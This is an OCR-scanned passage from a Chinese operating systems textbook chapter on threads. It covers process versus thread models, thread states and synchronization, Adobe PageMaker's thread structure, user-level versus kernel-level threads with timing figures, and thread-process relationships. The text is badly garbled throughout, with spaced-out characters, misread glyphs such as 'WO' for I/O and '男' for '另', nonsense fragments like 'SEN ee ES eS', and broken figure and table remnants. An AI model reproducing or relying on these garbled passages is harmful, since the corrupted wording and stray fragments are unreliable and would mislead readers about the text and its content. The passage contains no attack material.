法 。Java 运行 时 环境 是 单 进程 多 线程 的 一 个 例子 。 本 节 所 关心 的 是 使 用 多 进程 ， 且 每 个 进程 支持 多 
个 线程 的 情况 。 这 一 方法 被 Windows、Solaris 和 很 多 现代 版 本 的 UNIX 等 操作 系统 所 采用 。 本 节 给 
出 一 个 对 多 线程 的 通用 描述 ， 本 章 后 面部 分 将 讨论 Windows, Solaris 和 Linux 中 的 相关 细节 。 

在 多 线程 环境 中 ， 进 程 被 定义 成 资源 分 配 的 单位 和 一 个 被 保护 的 单位 ， 与 进程 相关 联 的 有 : 

@ 存放 进程 映像 的 虚拟 地 址 空间 。 

o 受 保 护 地 对 处 理 器 、 其 他 进程 (用 于 进程 间 通 信 )、 文 件 和 LO 资源 (设备 和 通道 ) 的 访问 。 


O R, 我 们 甚至 不 能 达到 这 一 程度 的 一 致 性 。 在 IBM 的 大 型 机 操作 系统 中 ， 地 址 空间 和 任务 的 概念 分 别 粗略 地 
对 应 于 本 节 中 描述 的 进程 和 线程 的 概念 。 在 文献 当中 ， 术 语 轻 量 级 进程 还 被 用 做 : 1 ) 等 同 于 术语 线程 ; 2 ) 
一 种 称 为 内 核 级 线程 的 特殊 类 型 的 线程 ; 3 ) 在 Solaris 中 ， 一 种 把 用 户 级 线程 映射 到 内 核 级 线程 的 实体 。 
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多 进程 、 每 个 进程 一 个 线程 ， ”多 进程 、 每 个 进程 多 个 线程 
$= 指令 轨迹 
图 4.1 线程 和 进程 [ANDE97 ] 


在 一 个 进程 中 ， 可 能 有 一 个 或 多 个 线程 ， 每 个 线程 有 : 

@ 线程 执行 状态 (运行 、 就 绪 等 )。 

@ 在 未 运行 时 保存 的 线程 上 下 文 ; 从 某 种 意义 上 看 ， SEN ee ES eS 

地 操作 的 程序 计数 器 。 

@ 一 个 执行 栈 。 

© 用 于 每 个 线程 局 部 变量 的 静态 存储 空间 。 

@ 与 进程 内 的 其 他 线程 共享 的 对 进程 的 内 存 和 资源 的 访问 。 

图 4.2 从 进程 管理 的 角度 说 明了 线程 和 进程 的 区 别 。 在 单线 程 进程 模型 中 ( 即 并 没有 明确 的 
线程 概念 )， 进程 的 表示 包括 它 的 进程 控制 块 和 用 户 地 址 空间 ,以 及 在 进程 执行 中 管理 洞 用 /返回 
行为 的 用 户 栈 和 内 核 栈 。 当 进程 正在 运行 时 , 处 理 器 寄存 器 将 被 该 进程 所 控制 ; 当 进程 不 运行 时 ， 
这 些 处 理 器 寄存 器 中 的 内 容 将 被 保存 。 在 多 线程 环境 中 , 进程 仍然 只 有 一 个 与 之 关联 的 进程 控制 
块 和 用 户 地 址 空间 。 但 是 每 个 线程 都 有 一 个 独立 的 栈 , 还 有 独立 的 控制 块 用 于 包含 寄存 器 值 、 优 
先 级 和 其 他 与 线程 相关 的 状态 信息 。 

Alt, 进程 中 的 所 有 线程 共享 该 进程 的 状态 和 资源 ， 它们 驻 留 在 同一 块 地 址 空间 中 ， 并 且 可 
以 访问 到 相同 的 数据 。 当 一 个 线程 改变 了 内 存 中 的 一 个 数据 项 时 , 其 他 线程 在 访问 这 一 数据 项 时 
能 够 看 到 变化 后 的 结果 。 如果 一 个 线程 以 读 权 限 打 开 一 个 文件 , 那么 同一 个 进程 中 的 其 他 线程 也 
能 够 从 这 个 文件 中 读 取 数据 。 
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图 4.2 单线 程 和 多 线程 的 进程 模型 


从 性 能 比较 可 以 看 出 线程 的 重要 优点 如 下 : 
1 ) 在 一 一 个 已 有 进程 中 创建 一 个 新 线程 比 创建 一 个 全 新 进程 所 需 的 时 间 要 少许 多。 Mach 开 
发 者 的 研究 表明 ， 线 程 创建 要 比 在 UNIX 中 的 进程 创建 快 10 倍 ITEVA87]。 
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2) 终止 一 个 线程 比 终止 一 个 进程 花费 的 时 间 少 。 
3 ) 同一 进程 内 线程 间 切 换 比 进程 间 切 换 花 费 的 时 间 少 。 
4) 线程 提高 了 不 同 的 执行 程序 间 通 信 的 效率 。 在 大 多 数 操作 系统 中 ， 独 立 进程 间 的 通信 需 
要 内 核 的 介入 ， 以 提供 保护 和 通信 所 需要 的 机 制 。 但 是 ， 由 于 在 同一 个 进程 中 的 线程 共 
享 内 存 和 文件 ， 它 们 无 需 调 用 内 核 就 可 以 互相 通信 。 
因此 , 如 果 一 个 应 用 程序 或 函数 被 实现 为 一 组 相关 联 的 执行 单位 , 那么 用 一 组 线程 比 用 一 组 
分 离 的 进程 更 有 效 。 
使 用 线程 的 应 用 程序 的 一 个 例子 是 文件 服务 器 。 当 每 个 新 文件 请 求 到 达 时 ，, 会 为 文件 管理 程 
序 创建 一 个 新 的 线程 ,由 于 服务 器 将 会 处 理 到 很 多 请 求 ,那么 将 会 在 短期 内 创建 和 销毁 许多 线程 。 
如 果 服 务 器 运行 在 多 处 理 器 机 器 上 ,那么 在 同一 个 进程 中 的 多 个 线程 就 可 以 同时 在 不 同 的 处 理 器 
上 执行 。 此 外 ,由 于 文件 服务 中 的 进程 或 线程 必须 共享 文件 数据 , 并 据 此 协调 它们 的 行为 ， 此 时 
使 用 线程 和 共享 内 存 比 使 用 进程 和 消息 传递 要 快 。 
在 单 处 理 器 中 ， 为 了 简化 在 逻辑 上 完成 若干 项 不 同 功能 的 程序 的 结构 ， 线 程 也 是 有 用 的 。 
[ LETW88 ] 给 出 了 在 单 用 户 多 处 理 系 统 中 使 用 线程 的 4 个 例子 : 
@ 前 台 和 后 台 工 作 : 例如 ， 在 电子 表格 程序 中 ， 一 个 线程 可 以 显示 菜单 并 读 取 用 户 输入 ， 
而 另 一 个 线程 执行 用 户 命令 并 更 新 电子 表格 。 这 种 方案 允许 程序 在 前 一 条 命令 完成 前 提 
示 输 入 下 一 条 命令 ， 因 而 常常 会 使 用 户 感觉 到 应 用 程序 的 响应 速度 有 所 提高 。 
e 异步 处 理 : 程序 中 的 异步 元 素 可 以 用 线程 实现 。 例如， 为 避免 掉 电 带 来 的 损失 ， 往 往 把 
文字 处 理 程序 设计 成 每 隔 一 分 钟 将 随机 存 到 存储 器 (RAM ) 缓冲 区 中 的 数据 写 人 磁盘 一 
次 。 可 以 创建 一 个 线程 ,其 任务 是 周期 性 地 进行 备份 ， 并 且 直 接 由 操作 系统 调度 该 线程 。 
这 样 ， 在 主 程序 中 就 不 需要 特别 的 代码 来 提供 时 间 检 查 或 者 协调 输入 和 输出 。 
@ 执行 速度 : 一 个 多 线程 进程 在 计算 这 批 数 据 的 同时 可 以 从 设备 读 取 下 一 - 批 数据 。 在 多 处 
理 器 系统 中 ， 同 一 个 进程 中 的 多 个 线程 可 以 同时 执行 。 这 样 ， 即 便 一 个 线程 在 读 取 数 据 
时 由 于 IO 操作 被 阻塞 ， 另 外 一 个 线程 仍然 可 以 继续 运行 。 
@ 模块 化 程序 结构 : 涉及 多 种 活动 或 多 种 输入 输出 的 源 和 目的 地 的 程序 更 易于 用 线程 设计 
和 实现 。 
在 支持 线程 的 操作 系统 中 , 调度 和 分 派 是 在 线程 基础 上 完成 的 ; 因此 大 多 数 与 执行 相关 的 信 
息 可 以 保存 在 线程 级 的 数据 结构 中 。 但是， 有些 活 动 影响 着 进程 中 的 所 有 线程 ,操作 系统 必须 在 
进程 一 级 对 它们 进行 管理 。 例 如, 挂 起 操作 涉及 把 一 个 进程 的 地 址 空间 换 出 内 存 以 为 其 他 进程 的 
地 址 空间 腾 出 位 置 。 因 为 一 个 进程 中 的 所 有 线程 共享 同一 个 地 址 空间 ,所 以 它们 都 会 同时 被 挂 起 。 
类 似 地 ， 进 程 的 终止 会 导致 进程 中 所 有 线程 的 终止 。 


4.1.2 ”线程 功能 特性 


和 进程 一 样 , 线程 具有 执行 状态 , 且 可 以 相互 之 间 进 行 同步 。 下 面 依次 考虑 线程 这 两 方面 的 
功能 特性 。 
线程 状态 
和 进程 一 样 , 线程 的 关键 状态 有 运行 态 、 就 绪 态 和 阻塞 态 。 一 般 来 说 ， 挂 起 态 对 线程 没有 什 
么 意义 ,这 是 由 于 此 类 状态 是 一 个 进程 级 的 概念 。 特 别 地 ， 如 果 一 个 进程 被 换 出 , 由 于 它 的 所 有 
线程 都 共享 该 进程 的 地 址 空间 ， 因 此 它们 必须 都 被 换 出 。 
有 4 种 与 线程 状态 改变 相关 的 基本 操作 [ANDE04 j: 
o 派生 ; 在 典型 情况 下 ， 当 派生 一 个 新 进程 时 ， 同 时 也 为 该 进程 派生 了 一 个 线程 。 随 后 ， 
进程 中 的 线程 可 以 在 同一 个 进程 中 派生 另 一 个 线程 ， 并 为 新 线程 提供 指令 指针 和 参数 ; 
新 线程 拥有 自己 的 寄存 器 上 下 文 和 栈 空 间 ， 且 被 放置 在 就 绪 队 列 中 。 
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@ 阻塞 : 当 线 程 需要 等 待 一 个 事件 时 ， 它 将 被 阻塞 ( 保存 它 的 用 户 寄存 器 、 程 序 计数 器 和 
栈 指 针 )， 此 时 处 理 器 转 而 执行 另 一 个 处 于 同一 进程 中 或 不 同 进程 中 的 就 绪 线 程 。 

o 解除 阻塞 : 当 阻 塞 一 个 线程 的 事件 发 生 时 ， 该 线程 被 转移 到 就 绪 队 列 中 。 

o 结束 : 当 一 个 线程 完成 时 ， 其 寄存 器 上 下 文 和 栈 都 被 释放 。 

一 个 重要 的 问题 是 ,一 个 线程 的 阻塞 是 否 会 导致 整个 进程 的 阻塞 , 换言之 , 如 果 进 程 中 的 一 
个 线程 被 阻塞 , 这 是 否 会 阻止 进程 中 其 他 线程 的 运行 ( 即使 这 些 线程 处 于 就 绪 状 态 ) ? 显然 ,如 
果 一 个 被 阻塞 的 线程 阻塞 了 整个 进程 ， 就 会 丧失 线程 的 某 些 灵活 性 和 能 力 。 

随后 会 在 讨论 用 户 级 线程 和 内 核 级 线程 中 再 回 到 这 个 问题 ,但 现在 先 考 虑 一 下 线程 不 会 阻塞 
整个 进程 的 情况 下 的 性 能 获 益 。 图 4.3 ( 基于 [ KLEI96 ] 中 的 图 ) 显示 了 一 个 执行 了 两 个 远程 过 程 
调用 (RPC) 的 程序 9 这 两 个 调用 分 别 涉及 两 个 不 同 的 主机 ， 用 于 获得 一 个 组 合 的 结果 。 在 单线 程 
程序 中 ,其 结果 是 按 顺序 获得 的 ， 因 此 程序 必须 依次 等 待 来 自 每 个 服务 器 的 响应 。 重 写 这 个 程序 ， 
为 每 个 RPC 使 用 一 个 独立 的 线程 ， 可 以 使 速度 得 到 实质 性 的 提高 。 注 意 ， 如 果 这 个 程序 在 单 处 理 
器 上 运行 ,那么 必须 顺序 地 产生 请 求 并 且 顺 序 地 处 理 结果 ， 但 是 对 两 个 应 答 的 等 待 是 并 发 的 。 


RPC 请 求 RPC 请 求 










进程 C0000 0 0 0 0 0 0 ONIA AT MP OOM ONG 


线程 A〈 进 程 1) El 
线程 B (进程 1) 






hil E eT 


RPC 请 求 








图 4.3 ”使 用 线程 的 远程 过 程 调 用 (RPC) 


在 单 处 理 器 中 ,多 道 程序 设计 使 得 在 多 个 进程 中 的 多 个 线程 可 以 交替 执行 。 在 如 图 4.4 所 示 
的 例子 中 , 两 个 进程 中 的 三 个 线程 在 处 理 器 中 交替 执行 。 在 当前 正在 运行 的 线程 阻塞 或 它 的 时 间 
片 用 完 时 ,执行 传递 到 另 一 个 线程 。 
线程 同步 

一 个 进程 中 的 所 有 线程 共享 同一 个 地 址 空间 和 诸如 打开 的 文件 之 类 的 其 他 资源 。 一 个 线程 
对 资源 的 任何 修改 都 会 影响 同一 个 进程 中 其 他 线程 的 环境 。 因 此 ， 需 要 同步 各 种 线程 的 活动 ， 
以 便 它们 互 不 干涉 且 不 破坏 数据 结构 。 例 如, 如 果 两 个 线程 都 试图 同时 往 一 个 双向 链表 中 增加 一 
个 元 素 ， 则 可 能 会 丢失 一 个 元 素 或 者 破坏 链表 结构 。 


© RPC 技术 可 以 在 不 同 机 器 上 执行 两 个 程序 ， 使 用 过 程 调用 /返回 语法 和 语义 进行 交互 。 调 用 程序 和 被 调用 程序 
都 把 对 方 当做 是 在 同一 台 机 器 中 运行 。RPC 常用 于 客户 端 /服务 器 模式 的 应 用 程序 中 ， 将 在 第 16 章 详细 讲述 。 

© 在 这 个 例子 中 , 线程 C 在 线程 A 用 完 它 的 时 间 片 后 开始 运行 ， 即 使 此 时 线程 B 也 在 就 绪 态 。 选择 B 还 是 选择 
C 是 一 个 调度 决策 问题 ， 相 关 主 题 将 在 本 书 第 四 部 分 讲述 。 
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4.4 单 处 理 器 上 的 多 线程 例子 


线程 同步 带 来 的 问题 和 使 用 的 技术 通常 与 进程 同步 相同 ， 这 些 问题 和 技术 是 第 5 章 和 第 6 
章 的 主题 。 


4.1.3 ”例子 : Adobe PageMakere 


使 用 多 线程 的 一 个 例子 是 在 共享 系统 中 运行 的 Adobe PageMaker 应 用 程序 。PageMaker 是 用 
于 桌面 排版 系统 的 一 个 编辑 、 设 计 和 生产 出 版 工具 。 图 4.5 [KRON90 ] 中 显示 了 OS/2 上 
PageMaker 的 线程 结构 ， 采 用 这 种 结构 是 为 了 优化 该 应 用 程序 的 响应 ( 在 其 他 操作 系统 上 可 以 
发 现 相似 的 线程 结构 )。 有 三 个 线程 总 是 活 牙 的 : 事件 处 理 
线程 、 屏 幕 重 画 线程 和 服务 线程 。 

一 般 地 ， 如 果 有 些 输入 信息 需要 过 多 的 处 理 ，OS/2 在 
管理 窗口 时 的 响应 时 间 将 变 糟 ，OS/2 的 指导 策略 是 任何 信 
息 都 不 应 该 需要 超过 0.1s 的 处 理 时 间 。 例如 , 在 处 理 一 条 打 
印 命令 时 , 调用 一 个 用 于 打印 一 页 的 子 程序 会 使 得 系统 不 再 
给 应 用 程序 进一步 分 派 任何 信息 ,这 降低 了 性 能 。 为 达到 这 
个 标准 ，PageMaker 中 耗费 时 间 的 用 户 操作 (打印 、 导 和 人数 
据 和 排版 ) 都 由 服务 线程 完成 。 程 序 的 大 部 分 初始 化 工作 也 
由 服务 线程 完成 , 这 缩短 了 当 用 户 调用 一 个 会 话 来 创建 一 个 
新 文件 或 打开 一 个 现 有 的 文件 时 需要 的 空闲 时 间 。 一 个 独立 
的 线程 等 待 新 的 事件 消息 。 图 4.5 Adobe PageMaker 的 线程 结构 

服务 线程 和 事件 处 理 线程 的 同步 是 很 复杂 的 , 因为 用 户 可 能 不 断 地 打字 或 移动 鼠标 , 这 会 激 
活 事 件 处 理 线程 , 而 服务 线程 仍然 处 于 忙 状 态 。 如 果 发 生 了 冲突 , PageMaker 将 过 滤 掉 这 些 消息 ， 
只 接受 某 些 最 基本 的 消息 ， 如 改变 窗口 大 小 。 

在 服务 线程 发 给 事件 处 理 线程 一 个 消息 表示 其 任务 已 经 完成 之 前 , PageMaker 中 的 用 户 活动 
是 受 限 制 的 。 程序 通 过 禁止 使 用 菜单 项 并 显示 “忙碌 ”光标 来 表明 这 一 点 。 用 户 可 以 自由 切换 到 
别 的 应 用 程序 。 当 “忙碌 ”光标 移动 到 另 一 个 窗口 时 ， 它 将 为 该 应 用 程序 改变 成 合适 的 光标 。 

为 屏幕 重 画 使 用 独立 的 线程 有 两 个 原因 : 

1) PageMaker 对 在 一 页 中 可 以 出 现 的 对 象 数 没 有 限制 ， 因 此 ， 处 理 重 画 请 求 所 需 的 时 间 很 

容易 超过 0.1s。 

2) 使 用 独立 的 线程 允许 用 户 中 止 画 图 。 在 这 种 情况 下 ， 当 用 户 重新 调节 页 大 小 时 ， 可 以 立 

即 进行 重 画 。 如 果 程 序 在 着 手 以 新 的 比例 显示 之 前 要 先 完成 已 经 过 时 的 显示 ， 那 么 响应 
时 间 将 打折 扣 。 l 





O 这 个 例子 稍微 有 点 过 时 。 不 过 ， 它 说 明了 一 个 有 很 好 的 文档 的 实现 的 基本 概念 。 
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动态 滚动 ( 即 当 用 户 拖 动 滚动 条 时 重 画 屏幕 ) 也 是 可 以 实现 的 。 事 件 处 理 线程 监视 滚动 条 并 
重 画 标尺 〈 快速 重 画 ， 并 反馈 给 用 户 即时 位 置 )， 在 这 期 间 ， 屏 幕 重 画 线 程 不 断 地 试图 重 画 该 页 
来 跟 上 滚动 进度 。 

车 不 使 用 多 线程 实现 动态 重 画 , 则 需要 在 程序 的 各 个 地 方 轮 询 消息 ,而 这 会 给 应 用 程序 带 来 
很 大 负担 。 多 线程 可 以 将 并 发 活动 在 代码 中 很 自然 地 分 开 。 


414 ”用 户 级 和 内 核 级 线程 


线程 的 实现 可 以 分 为 两 大 类 : 用 户 级 线程 ( User-Level Thread, ULT) 和 内 核 级 线程 
( Kernel-Level Thread, KLT) 9S 。 后 者 又 称 做 内 核 支持 的 线程 或 轻 量 级 进程 。 


用 户 级 线程 

在 一 个 纯粹 的 用 户 级 线程 软件 中 , 有 关 线程 管理 的 所 有 工作 都 由 应 用 程序 完成 , 内 核 意识 不 
到 线程 的 存在 。 图 4.6a 说 明了 纯粹 的 用 户 级 线程 方法 。 任 何 应 用 程序 都 可 以 通过 使 用 线程 库 被 
设计 成 多 线程 程序 。 线 程 库 是 用 于 用 户 级 线程 管理 的 一 个 例 程 包 , 它 包含 用 于 创建 和 销毁 线程 的 
代码 在 线程 间 传 递 消息 和 数据 的 代码 .调度 线程 执行 的 代码 以 及 保存 和 恢复 线程 上 下 文 的 代码 。 

在 默认 情况 下 ,应 用 程序 从 单线 程 开始 , 并 在 该 线程 中 开始 运行 。 该 应 用 程序 和 它 的 线程 被 
分 配给 一 个 由 内 核 管理 的 进程 。 在 应 用 程序 正在 运行 ( 进程 处 于 运行 态 ) 的 任何 时 刻 , 应 用 程序 
都 可 以 派生 一 个 在 相同 进程 中 运行 的 新 线程 。 派 生 线程 是 通过 调用 线程 库 中 的 派生 例 程 完成 的 。 
通过 过 程 调用 , 控制 权 被 传递 给 派生 例 程 。 线 程 库 为 新 线程 创建 一 个 数据 结构 ,然后 使 用 某 种 调 
度 算法 , 把 控制 权 传 递 给 该 进程 中 处 于 就 绪 态 的 一 个 线程 。 当 控制 权 被 传递 给 线程 库 时 , 需要 保 
存 当 前 线程 的 上 下 文 ， 然 后 当 控 制 权 从 线程 库 中 传递 给 一 个 线程 时 ， 将 恢复 那个 线程 的 上 下 文 。 
上 下 文 实际 上 包括 用 户 寄存 器 的 内 容 、 程 序 计 数 器 和 栈 指针 。 





a) 纯粹 的 用 户 级 b) 纯粹 的 内 核 级 
$ 用户 级 线程 Oneeen (Ce) 进程 





图 4.6 用 户 级 线程 和 内 核 级 线程 


在 前 一 段 中 描述 的 所 有 活动 都 发 生 在 用 户 空间 中 , 并 且 发 生 在 一 个 进程 内 , 而 内 核 并 不 知道 

这 些 活动 。 内 核 继续 以 进程 为 单位 进行 调度 , 并 且 给 该 进程 指定 一 个 执行 状态 ( 就 绪 态 、 运 行 态 、 
阻塞 态 等 )。 下 面 的 例子 将 阐述 线程 调度 和 进程 调度 的 关系 。 假 设 进程 B 在 它 的 线程 2 中 执行 ， 
进程 和 作为 进程 一 部 分 的 两 个 用 户 级 线程 的 状态 如 图 4.7a 所 示 , 则 可 能 发 生 以 下 任何 一 种 情况 : 
1 ) 线程 2 中 执行 的 应 用 程序 进行 系统 调用 ， 阻 塞 了 进程 B。 例 如 ， 进 行 一 次 WO 调用。 这 
导致 控制 转移 到 内 核 ， 内 核 启 动 IO 操作 ， 把 进程 B 置 于 阻塞 状态 ， 并 切换 到 男 一 个 进 

程 。 在 此 期 间 ， 根 据 线程 库 维护 的 数据 结构 ， 进 程 B 的 线程 2 仍 处 于 运行 态 。 值 得 注意 


O 缩写 ULT 和 KLT 并 没有 被 广泛 使 用 ， 引 入 它们 只 是 为 了 表达 上 的 简明 。 
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的 是 ， 从 在 处 理 器 上 执行 的 角度 看 ， 线程 2 实际 上 并 不 处 于 运行 态 ， 但 是 在 线程 库 看 来 ， 
它 处 于 运行 态 。 相 应 的 状态 图 见 图 4.7b。 

2 ) 时 钟 中 断 把 控制 传递 给 内 核 ， 内 核 确定 当前 正在 运行 的 进程 (B) 已 经 用 完了 它 的 时 间 
A. 内核 把 进程 B 置 于 就 绪 态 并 切换 到 另 一 个 进程 。 同 时, 根据 线程 岸 维护 的 数据 结构 ， 
进程 B 的 线程 2 仍 处 于 运行 态 。 相 应 的 状态 图 如 图 4.7c 所 示 。 

3) 线程 2 运行 到 需要 进程 B 的 线程 1 执行 某 些 动作 的 一 个 点 。 些 时， 线程 2 进入 限 塞 态 ， 
而 线程 1 从 就 绪 态 转换 到 运行 态 , 进程 自身 保留 在 运行 态 。 相 应 的 状态 图 如 图 4.7d 所 示 。 

在 第 1 种 和 第 2 种 情况 中 (如 图 4.7b 和 图 4.7c 所 示 )， 当 内 核 把 控制 切换 回 进 程 B 时 ， 线 

程 2 会 恢复 执行 。 还 需 注 意 进程 在 执行 线程 库 中 的 代码 时 可 以 被 中 断 , 或 者 是 由 于 它 的 时 间 片 用 
Sl, 或 者 是 由 于 被 一 个 更 高 优先 级 的 进程 所 抢占 。 因 此 在 中 断 时 , 进程 有 可 能 处 于 线程 切换 的 
中 间 时 刻 ， 即 正在 从 一 个 线程 切换 到 另 一 个 线程 。 当 该 进程 被 恢复 时 ,线程 库 得 以 继续 运行 ,并 
完成 线程 切换 和 把 控制 转移 给 该 进程 中 的 另 一 个 线程 。 














图 4.7 用户 级 线程 状态 和 进程 状态 间 的 关系 


使 用 用 户 级 线程 而 不 是 内 核 级 线程 有 很 多 优点 ， 包 括 : | 

1) 由 于 所 有 线程 管理 数据 结构 都 在 一 个 进程 的 用 户 地址 空间 中 ， 线 程 切换 不 需要 内 核 态 特 
权 ， 因 此 ， 进 程 不 需要 为 了 线程 管理 而 切换 到 内 核 态 ， 这 节省 了 两 次 状态 转换 〈 从 用 户 
态 到 内 核 态 ;从 内 核 态 返回 到 用 户 态 ) 的 开销 。 

2 ) 调度 可 以 是 应 用 程序 相关 的 。 一 个 应 用 程序 可 能 更 适合 简单 的 轮转 调度 算法 ， 而 另 一 个 
应 用 程序 可 能 更 适合 基于 优先 级 的 调度 算法 。 可 以 做 到 为 应 用 程序 量 身 定做 调度 算法 而 
不 扰乱 底层 的 操作 系统 调度 程序 。 

3 ) 用 户 级 线程 可 以 在 任何 操作 系统 中 运行 ， 不 需要 对 底层 内 核 进行 修改 以 支持 用 户 级 线 
程 。 线 程 库 是 一 组 供 所 有 应 用 程序 共享 的 应 用 程序 级 别 的 函数 。 

用 户 级 线程 相对 于 内 核 级 线程 有 两 个 明显 的 缺点 : 

1) 在 典型 的 操作 系统 中 ， 许 多 系统 调用 都 会 引起 阻塞 。 央 此 ， 当 用 户 级 线程 执行 一 个 系统 
调用 时 ， 不 仅 这 个 线程 会 被 阻塞 ， 进 程 中 的 所 有 线程 都 会 被 阻塞 。 


114 B-RA it #2 


2) 在 纯粹 的 用 户 级 线程 策略 中 ， 一 个 多 线程 应 用 程序 不 能 利用 多 处 理 技术 。 内 核 一 次 只 把 
一 个 进程 分 配给 一 个 处 理 器 ， 因 此 一 个 进程 中 只 有 一 个 线程 可 以 执行 。 事 实 上 ， 在 一 个 
进程 内 ， 我 们 相当 于 实现 了 应 用 程序 级 别 的 多 道 程序 。 虽 然 多 道 程序 会 使 得 应 用 程序 的 
速度 明显 提高 ， 但 是 同时 执行 部 分 代码 更 会 使 某 些 应 用 程序 受益 。 
现在 已 有 解决 这 两 个 问题 的 方法 。 例如 ,可 以 通过 把 应 用 程序 写成 一 个 多 进程 程序 , 而 不 是 
多 线程 程序 来 克服 这 两 个 问题 。 但 是 , 这 个 方法 消除 了 线程 的 主要 优点 : 每 次 切换 都 变 成 了 进程 
间 的 切换 ， 而 不 是 线程 间 的 切换 ， 从 而 导致 开销 过 大 。 
另 一 种 克服 线程 阻塞 问题 的 方法 是 使 用 一 种 称 做 jacketing 的 技术 。jacketing 的 目标 是 把 一 
个 产生 阻塞 的 系统 调用 转化 成 一 个 非 阻塞 的 系统 调用 。 例 如 ， 不 是 直接 调用 一 个 系统 VO 例 程 ， 
而 是 让 线程 调用 一 个 应 用 级 的 WO jacket 例 程 ， 这 个 jacket 例 程 中 的 代码 用 来 检查 并 确定 IO 设 
备 是 否 忙 。 如 果 忙 , 该 线程 进入 阻塞 状态 并 将 控制 传送 给 另 一 个 线程 。 当 这 个 线程 后 来 又 重新 获 
得 控制 时 ，jacket 例 程 会 再 次 检查 IO 设备 。 
内 核 级 线程 
在 一 个 纯粹 的 内 核 级 线程 软件 中 , 有 关 线 程 管理 的 所 有 工作 都 是 由 内 核 完 成 的 , 应 用 程序 部 
分 没有 进行 线程 管理 的 代码 ， 只 有 一 个 到 内 核 线程 设施 的 应 用 程序 编程 接口 (API) Windows 
是 这 种 方法 的 一 个 例子 。 
图 4.6b 显示 了 纯粹 的 内 核 级 线程 的 方法 。 内 核 为 进程 及 其 内 部 的 每 个 线程 维护 上 下 文 信息 。 调 度 
是 由 内 核 基于 线程 完成 的 。 该 方法 克服 了 用 户 级 线程 方法 的 两 个 基本 人 缺陷。 首先， 内 核 可 以 同时 把 同 
一 个 进程 中 的 多 个 线程 调度 到 多 个 处 理 器 中 ; 其 次 ， 如 果 进 程 中 的 一 个 线程 被 阻塞 ， 内 核 可 以 调度 同 
一 个 进程 中 的 另 一 个 线程 。 内 核 级 线程 方法 的 另 一 个 优点 是 内 核 例 程 自身 也 是 可 以 使 用 多 线程 的 。 
相对 于 用 户 级 线程 方法 , 内 核 级 线程 方法 的 主要 缺点 是 : 在 把 控制 从 一 个 线程 传送 到 同一 个 
进程 内 的 另 一 个 线程 时 , 需要 到 内 核 的 状态 切换 。 为 说 明 它 们 的 区 别 , 表 4.1 给 出 了 在 单 处 理 器 
VAX 机 上 运行 类 UNIX 操作 系统 的 测量 结果 。 这 里 进行 了 两 种 测试 : Null Fork 和 Signal-Wait, 
前 者 测试 创建 、 调 度 、 执 行 租 完成 一 个 调用 空 过 程 的 进程 /线程 的 时 间 ( 也 就 是 派生 一 个 进程 / 线 
程 的 开销 )， 后 者 测量 进程 /线程 给 正在 等 待 的 进程 /线程 发 信号 ， 然 后 在 某 个 条 件 上 等 待 所 需要 
的 时 间 (也 就 是 两 个 进程 /线程 的 同步 时 间 )。 可 以 看 出 用 户 级 线程 和 内 核 级 线程 之 间 、 内 核 级 线 
程 和 进程 之 间 都 有 一 个 数量 级 以 上 的 性 能 差距 。 


表 4.1 线程 和 进程 操作 执行 时 间 Cus) 


操 作 用 户 级 线程 内 核 级 线程 进 程 
Null Fork 34 948 11300 
Signal-Wait 37 441 1840 


因此 , 从 表面 上 看 , 虽然 使 用 内 核 级 线程 多 线程 技术 会 比 使 用 单线 程 的 进程 有 明显 的 速度 提 
高 , 使 用 用 户 级 线程 却 比 内 核 级 线程 又 有 额外 的 提高 。 不 过 这 个 额外 的 提高 是 否 真 的 能 够 实现 要 
取决 于 应 用 程序 的 性 质 。 如 果 应 用 程序 中 的 大 多 数 线程 切换 都 需要 内 核 态 的 访问 , 那么 基于 用 户 
级 线程 的 方案 不 会 比 基 于 内 核 级 线程 的 方案 好 多 少 。 
组 合 方法 

某 些 操作 系统 提供 了 一 种 组 合 的 用 户 级 线程 /内 核 级 线程 设施 ( 见 图 4.6c )。 在 组 合 的 系统 中 ， 
线程 创建 完全 在 用 户 空间 中 完成 , 线程 的 调度 和 同步 也 是 在 应 用 程序 中 进行 。 一 个 应 用 程序 中 的 
多 个 用 户 级 线程 被 映射 到 一 些 ( 小 于 或 等 于 用 户 级 线程 的 数目 ) 内 核 级 线程 上。 程序 员 可 以 为 特 
定 的 应 用 程序 和 处 理 器 调节 内 核 级 线程 的 数目 ， 以 达到 整体 最 佳 结果 。 
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在 组 合 方法 中 , 同一 个 应 用 程序 中 的 多 个 线程 可 以 在 多 个 处 理 器 上 并 行 地 运行 , 某 个 会 引起 
阻塞 的 系统 调用 不 会 阻塞 整个 进程 。 如 果 设 计 正 确 , 该 方法 将 会 结合 纯粹 用 户 级 线程 方法 和 内 核 
级 线程 方法 的 优点 ， 同 时 减少 它们 的 缺点 。 

在 用 组 合 方法 的 操作 系统 中 ，Solaris 是 一 个 很 好 的 例子 。 当 前 版 本 的 Solaris 限制 用 户 级 线 
程 /内 核 级 线程 的 关系 仅仅 能 为 1 : 1 的 关系 。 


415 ”其 他 方案 


正如 已 经 讲述 的 ， 资 源 分 配 和 分 派 单 位 的 概念 传统 上 包含 在 单个 的 进程 概念 中 ， 也 就 是 说 ， 
线程 和 进程 是 1 : 1 的 关系 。 近 年 来 ， 在 一 个 进程 中 提供 多 个 线程 成 为 研究 热点 。 这 是 一 种 多 对 
一 的 关系 。 此 外 还 有 两 种 组 合 ， 即 多 对 多 的 关系 和 一 对 多 的 关系 ， 如 表 4.2 所 示 。 


表 4.2 线程 和 进程 间 的 关系 










执行 的 每 个 线程 是 一 个 唯一 的 进程 ， 有 它 自己 的 地 址 空间 和 资源 
一 个 进程 定义 了 一 个 地 址 空间 和 动态 资源 所 有 权 。 可 以 在 该 进程 
中 创建 和 执行 多 个 线程 

一 个 线程 可 以 从 一 个 进程 环境 迁移 到 另 一 个 进程 环境 。 这 人 允许 线 
程 可 以 很 容易 地 在 不 同系 统 中 移动 


结合 了 M:1 和 1:M 情况 下 的 属性 


多 对 多 的 关系 
在 实验 性 操作 系统 TRIX [ PAZZ92，WARD80 ] 中 研究 了 线程 和 进程 间 的 多 对 多 关系 。 在 
TRIX 操作 系统 中 有 域 和 线程 的 概念 。 域 是 一 个 静态 的 实体 ， 包 含 一 个 地 址 空间 和 一 些 发 送 、 接 
收 消息 的 端口 ;线程 是 一 个 执行 路 径 ， 含 有 执行 栈 、 处 理 器 状态 和 调度 信息 。 
和 前 面 讲述 的 多 线程 方法 一 样 , 多 个 线程 可 在 一 个 域 中 执行 , 所 带 来 的 效率 收益 也 同 前 面 讨 
